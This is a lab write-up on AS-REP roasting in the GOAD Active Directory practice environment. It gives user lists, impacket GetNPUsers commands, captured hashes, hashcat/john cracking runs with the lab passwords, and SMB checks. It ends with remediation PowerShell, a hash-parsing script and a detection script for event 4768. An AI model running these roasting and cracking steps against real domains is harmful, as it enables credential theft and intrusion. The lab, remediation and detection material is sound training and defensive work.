GOAD provisions AS-REP roasting through its vulnerabilities.yml Ansible play, which calls the asrep_roasting role. That role runs Set-ADAccountControl to set DoesNotRequirePreAuth on specific accounts. In north.sevenkingdoms.local, the designated account is brandon.stark. In essos.local, it is missandei. No accounts in sevenkingdoms.local have the flag set.
Nothing needs to be configured manually. Both flags are present after the standard provisioning run.
How It Works
Kerberos pre-authentication requires a client to prove knowledge of their password before the KDC issues a TGT. It does this by encrypting a timestamp with the user’s key and including it as PA-ENC-TIMESTAMP in the AS-REQ. When UF_DONT_REQUIRE_PREAUTH is set, the KDC skips that check entirely and returns an AS-REP without validating the caller’s identity. The response contains a blob encrypted with the user’s password-derived key. An attacker can request that blob unauthenticated, take it offline, and crack it.
Enumeration
Impacket’s GetNPUsers.py requests AS-REPs for a given user list without supplying credentials. Winterfell and Meereen both accept unauthenticated requests, so no prior foothold is needed. Kingslanding is included for completeness. Build a username list for each domain first:
```bash
cat > north_users.txt << 'EOF'
arya.stark
eddard.stark
catelyn.stark
robb.stark
sansa.stark
brandon.stark
rickon.stark
hodor
jon.snow
samwell.tarly
jeor.mormont
sql_svc
administrator
EOF
cat > essos_users.txt << 'EOF'
daenerys.targaryen
viserys.targaryen
khal.drogo
missandei
drogon
jorah.mormont
sql_svc
administrator
EOF
cat > sk_users.txt << 'EOF'
tywin.lannister
jaime.lannister
cersei.lannister
tyron.lannister
robert.baratheon
joffrey.baratheon
renly.baratheon
stannis.baratheon
petyer.baelish
lord.varys
maester.pycelle
administrator
EOF
```
Then spray all three DCs, redirecting output into a single hashes file:
```bash
impacket-GetNPUsers north.sevenkingdoms.local/ \
    -dc-ip 10.3.10.11 -no-pass \
    -usersfile north_users.txt -format hashcat \
    2>/dev/null >> asrep_hashes.txt
impacket-GetNPUsers essos.local/ \
    -dc-ip 10.3.10.12 -no-pass \
    -usersfile essos_users.txt -format hashcat \
    2>/dev/null >> asrep_hashes.txt
impacket-GetNPUsers sevenkingdoms.local/ \
    -dc-ip 10.3.10.10 -no-pass \
    -usersfile sk_users.txt -format hashcat \
    2>/dev/null >> asrep_hashes.txt
```
North and essos each contribute a hash. Sevenkingdoms returns nothing. `asrep_hashes.txt` ends up with two entries:
```
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:3cbcb5674dee52f5670c4fdfa0a71d2e$...
$krb5asrep$23$missandei@ESSOS.LOCAL:8db94b0fa432d6e8ed91995c9f5b586b$...
```
After cracking, authenticated LDAP sweeps confirm no accounts were missed by the unauthenticated pass:
```bash
impacket-GetNPUsers north.sevenkingdoms.local/brandon.stark:iseedeadpeople \
    -dc-ip 10.3.10.11 -request -format hashcat
impacket-GetNPUsers essos.local/missandei:fr3edom \
    -dc-ip 10.3.10.12 -request -format hashcat
```
Both runs return the same single account each.
Cracking
Both hashes are krb5asrep type 23 (RC4-HMAC). Hashcat mode 18200:
```bash
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -O
```
Or with John:
```bash
john asrep_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep
```
John cracks both in 8 seconds on CPU alone:
```
iseedeadpeople ($krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL)
fr3edom ($krb5asrep$23$missandei@ESSOS.LOCAL)
2g 0:00:00:08 DONE (2026-03-01 14:49) 0.2412g/s 216596p/s
```
Confirm both against SMB:
```bash
nxc smb 10.3.10.11 -u brandon.stark -p iseedeadpeople -d north.sevenkingdoms.local
nxc smb 10.3.10.12 -u missandei -p fr3edom -d essos.local
```
```
SMB 10.3.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\brandon.stark:iseedeadpeople
SMB 10.3.10.12 445 MEEREEN [+] essos.local\missandei:fr3edom
```
Impact
brandon.stark has no significant ACL rights directly but provides a valid authenticated foothold into north for LDAP enumeration, Kerberoasting, and further ACL abuse chains. missandei is considerably more useful: she holds GenericAll over khal.drogo, who holds ManageCa and ManageCertificates on ESSOS-CA and is a local admin on Braavos. Two unauthenticated requests and a dictionary attack are enough to land on a path to the essos CA.
A Note on Encryption Types
The hashes above are RC4 (etype 23) because GetNPUsers.py requests that type by default and the accounts have no forced encryption policy. If AES-only is enforced (msDS-SupportedEncryptionTypes set to 24), the KDC returns etype 17 or 18 instead. The attack still works and the hash is still crackable offline, but AES-based AS-REPs are far slower to crack than RC4. Weak passwords will still fall; anything resembling a real passphrase likely won't. That is not a reason to rely on AES; it is a reason to fix the flag.
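To make the etype point concrete, here is an added example (not GOAD's or Impacket's code) that parses a hashcat-format AS-REP hash file like `asrep_hashes.txt`, reports the user, realm and etype of each entry, and groups the entries by the hashcat mode that would crack them. The RC4 layout matches the two lines above; the etype 17/18 layout (`$krb5asrep$<etype>$user$REALM$checksum$edata`, hashcat mode 32100) is an assumption modelled on hashcat's `$`-separated convention and should be checked against hashcat's example hashes. The sample lines are constructed: the encrypted-data fields are placeholders and the `hodor` AES entry is made up.

```python
"""Parse hashcat-style AS-REP hashes and report etype / cracking mode.

Added example, not part of GOAD or Impacket. Sample data is constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample file: the two RC4 entries from the page (edata
# replaced with placeholder hex) plus a made-up AES-256 (etype 18) entry.
SAMPLE_HASHES = """\
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:3cbcb5674dee52f5670c4fdfa0a71d2e$aabbccdd
$krb5asrep$23$missandei@ESSOS.LOCAL:8db94b0fa432d6e8ed91995c9f5b586b$11223344
$krb5asrep$18$hodor$NORTH.SEVENKINGDOMS.LOCAL$00112233445566778899aabb$deadbeef
"""

ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}
# 18200 is hashcat's "Kerberos 5, etype 23, AS-REP"; 32100 is its etype 17/18 AS-REP mode.
HASHCAT_MODES = {23: 18200, 17: 32100, 18: 32100}

# RC4 layout as written by GetNPUsers.py -format hashcat; the checksum is
# a 16-byte HMAC-MD5, so exactly 32 hex characters.
RC4_RE = re.compile(
    r"^\$krb5asrep\$23\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)
# Assumed AES layout (hashcat mode 32100 convention): $-separated fields.
AES_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$"
    r"(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$"
)


@dataclass
class AsRepHash:
    user: str
    realm: str
    etype: int
    checksum: str
    edata: str

    @property
    def etype_name(self) -> str:
        return ETYPE_NAMES[self.etype]

    @property
    def hashcat_mode(self) -> int:
        return HASHCAT_MODES[self.etype]

    @property
    def slow_to_crack(self) -> bool:
        """AES etypes use PBKDF2 key derivation, so guesses cost far more than RC4."""
        return self.etype in (17, 18)


def parse_asrep_hash(line: str) -> AsRepHash:
    """Parse one hashcat-format AS-REP line; raise ValueError on anything else."""
    line = line.strip()
    m = RC4_RE.match(line)
    if m:
        return AsRepHash(m["user"], m["realm"], 23, m["checksum"], m["edata"])
    m = AES_RE.match(line)
    if m:
        return AsRepHash(m["user"], m["realm"], int(m["etype"]), m["checksum"], m["edata"])
    raise ValueError(f"unrecognised AS-REP hash line: {line[:40]!r}")


def parse_hash_file(text: str) -> list[AsRepHash]:
    """Parse every non-empty line of an asrep_hashes.txt-style file."""
    return [parse_asrep_hash(l) for l in text.splitlines() if l.strip()]


def group_by_mode(hashes: list[AsRepHash]) -> dict[int, list[AsRepHash]]:
    """Group entries by hashcat mode, since one hashcat run handles one mode."""
    groups: dict[int, list[AsRepHash]] = {}
    for h in hashes:
        groups.setdefault(h.hashcat_mode, []).append(h)
    return groups


if __name__ == "__main__":
    for mode, entries in group_by_mode(parse_hash_file(SAMPLE_HASHES)).items():
        print(f"hashcat -m {mode}:")
        for h in entries:
            cost = "slow (AES)" if h.slow_to_crack else "fast (RC4)"
            print(f"  {h.user}@{h.realm}  etype {h.etype} ({h.etype_name})  {cost}")
```

Splitting the file by mode before cracking matters in practice: hashcat refuses a mixed-mode file, and the RC4 group is the one worth running first because it is the cheapest to guess against.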
Remediation
Enable pre-authentication on every account that has it disabled. There is almost no legitimate reason to disable it for standard user accounts.
```powershell
Set-ADAccountControl -Identity brandon.stark -DoesNotRequirePreAuth $false
Set-ADAccountControl -Identity missandei -DoesNotRequirePreAuth $false
```
Find all vulnerable accounts in a domain:
```powershell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth
```
Beyond fixing the flag, enforce long random passwords on any account that genuinely requires it. A 25-character random password does not prevent AS-REP collection but makes offline cracking impractical regardless of etype. For detection, Windows event ID 4768 with pre-authentication type 0x0 identifies AS-REQ packets where no pre-auth was supplied. It fires once per request, is not noisy, and should alert immediately.
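The 4768 rule above, as an added example that is not part of GOAD: it reads events in the XML shape the Windows Security log exports and raises an alert when a TGT was issued (`Status` 0x0) with `PreAuthType` 0, which is exactly the unauthenticated AS-REQ that GetNPUsers.py sends. The field names (`TargetUserName`, `TargetDomainName`, `IpAddress`, `TicketEncryptionType`, `PreAuthType`, `Status`) are the standard 4768 EventData names; the events themselves, the client IPs and the DC hostnames are constructed for the example.

```python
"""Flag AS-REP roasting from Windows Security event ID 4768.

Added example, not part of GOAD. Alerts on 4768 events where the KDC
issued a TGT (Status 0x0) although no pre-authentication was supplied
(PreAuthType 0). All sample events below are constructed.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ETYPE_NAMES = {"0x17": "RC4-HMAC", "0x11": "AES128", "0x12": "AES256"}


def _event(event_id: int, computer: str, data: dict) -> str:
    """Build one event in Windows Event XML (constructed test data only)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f"<Computer>{computer}</Computer></System>"
            f"<EventData>{fields}</EventData></Event>")


def _tgt(user, realm, ip, etype, preauth, status):
    return {"TargetUserName": user, "TargetDomainName": realm, "IpAddress": ip,
            "TicketEncryptionType": etype, "PreAuthType": preauth, "Status": status}


# Constructed sample log: one normal logon, two roasting requests, one
# smartcard logon (PreAuthType 15) and one unrelated 4769 service-ticket event.
SAMPLE_EVENTS = [
    _event(4768, "winterfell.north.sevenkingdoms.local",
           _tgt("arya.stark", "NORTH.SEVENKINGDOMS.LOCAL", "::ffff:10.3.10.60", "0x12", "2", "0x0")),
    _event(4768, "winterfell.north.sevenkingdoms.local",
           _tgt("brandon.stark", "NORTH.SEVENKINGDOMS.LOCAL", "::ffff:10.3.10.50", "0x17", "0", "0x0")),
    _event(4768, "meereen.essos.local",
           _tgt("missandei", "ESSOS.LOCAL", "::ffff:10.3.10.50", "0x17", "0", "0x0")),
    _event(4768, "kingslanding.sevenkingdoms.local",
           _tgt("cersei.lannister", "SEVENKINGDOMS.LOCAL", "::ffff:10.3.10.61", "0x12", "15", "0x0")),
    _event(4769, "winterfell.north.sevenkingdoms.local",
           {"TargetUserName": "arya.stark@NORTH.SEVENKINGDOMS.LOCAL", "Status": "0x0"}),
]


@dataclass
class Alert:
    user: str
    realm: str
    source_ip: str
    etype: str
    dc: str


def parse_event(xml_text: str) -> dict:
    """Flatten one Event XML record into a dict of System and EventData fields."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    computer = root.find("e:System/e:Computer", NS).text
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {"event_id": event_id, "computer": computer, **data}


def is_asrep_roast(ev: dict) -> bool:
    """True for a 4768 where a TGT was issued without any pre-authentication."""
    if ev.get("event_id") != 4768:
        return False
    preauth = int(ev.get("PreAuthType", "-1"))
    status = int(ev.get("Status", "0xffffffff"), 16)
    return preauth == 0 and status == 0


def detect_asrep_roasting(xml_events: list[str]) -> list[Alert]:
    """Run the rule over a batch of raw XML events and return one Alert per hit."""
    alerts = []
    for xml_text in xml_events:
        ev = parse_event(xml_text)
        if not is_asrep_roast(ev):
            continue
        ip = ev.get("IpAddress", "").removeprefix("::ffff:")
        etype = ETYPE_NAMES.get(ev.get("TicketEncryptionType", ""), ev.get("TicketEncryptionType", "?"))
        alerts.append(Alert(ev["TargetUserName"], ev["TargetDomainName"], ip, etype, ev["computer"]))
    return alerts


if __name__ == "__main__":
    for a in detect_asrep_roasting(SAMPLE_EVENTS):
        print(f"ALERT AS-REP roast: {a.user}@{a.realm} from {a.source_ip} "
              f"on {a.dc} (ticket etype {a.etype})")
```

Because a successful 4768 with PreAuthType 0 can only come from an account that has DoesNotRequirePreAuth set, the alert doubles as an inventory of which accounts still carry the flag; the `TicketEncryptionType` field tells you whether the attacker got an RC4 or AES blob.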